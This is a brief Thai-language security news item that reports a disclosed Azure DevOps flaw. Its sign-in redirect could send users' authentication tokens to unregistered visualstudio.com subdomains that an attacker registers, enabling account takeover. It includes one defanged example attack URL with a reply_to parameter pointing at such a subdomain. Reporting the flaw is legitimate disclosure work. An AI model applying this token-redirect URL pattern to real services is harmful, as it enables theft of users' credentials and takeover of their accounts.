นักวิจัยจาก Binary Security พบว่ามี Azure DevOps API ซึ่งพยายามเรียก subdomains ของ visualstudio.com ที่ยังไม่ถูกจดทะเบียน
ทำให้นักวิจัยสามารถสร้าง URL Azure DevOps sign-in ให้ reply ไปยัง subdomain ที่ถูกจดทะเบียนโดยนักวิจัย เมือ user ทำการ sign-in เสร็จแล้ว Azure DevOps จะส่ง authentication token ไปยัง subdomain นั้นทำให้ นักสามารถ Takeover account นั้นได้
ตัวอย่าง Attack URL
hxxps://app[.]vssps[.]visualstudio[.]com/_signin?realm=app.vsaex.visualstudio.com&reply_to=*https://feedsprodwcus0dr.feeds.visualstudio[.]com*/&redirect=1
ที่มา : binarysecurity